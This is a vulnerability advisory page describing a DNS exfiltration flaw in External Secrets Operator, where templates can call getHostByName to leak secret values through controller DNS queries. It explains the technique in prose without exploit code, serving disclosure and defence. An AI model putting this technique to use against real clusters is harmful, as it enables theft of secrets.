EUVD-2026-22190
GHSA-r2pg-r6h7-crf3
CVSS VectorNVD
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
3DescriptionNVD
Summary
The v2 template engine in runtime/template/v2/template.go imports Sprig’s TxtFuncMap() and removes env and expandenv, but leaves getHostByName available to user-controlled templates. Because ESO executes templates inside the controller process, an attacker who can create or update templated ExternalSecret resources can trigger controller-side DNS lookups using secret-derived values, creating a DNS exfiltration primitive.
Impact
This is a confidentiality issue. In environments where untrusted or lower-trust users can author templated ExternalSecret resources and the controller can perform DNS resolution, fetched secret material can be exfiltrated through DNS without requiring direct outbound access from the attacker’s workload.
AnalysisAI
DNS exfiltration in External Secrets Operator (ESO) allows authenticated Kubernetes users with ExternalSecret write permissions to leak secret material through controller-side DNS queries. The v2 template engine exposes Sprig's getHostByName function to user-controlled templates, enabling attackers to encode fetched secrets into DNS lookups performed by the ESO controller process. …
Sign in for full analysis, threat intelligence, and remediation guidance.
Vendor StatusVendor
Share
External POC / Exploit Code
Leaving vuln.today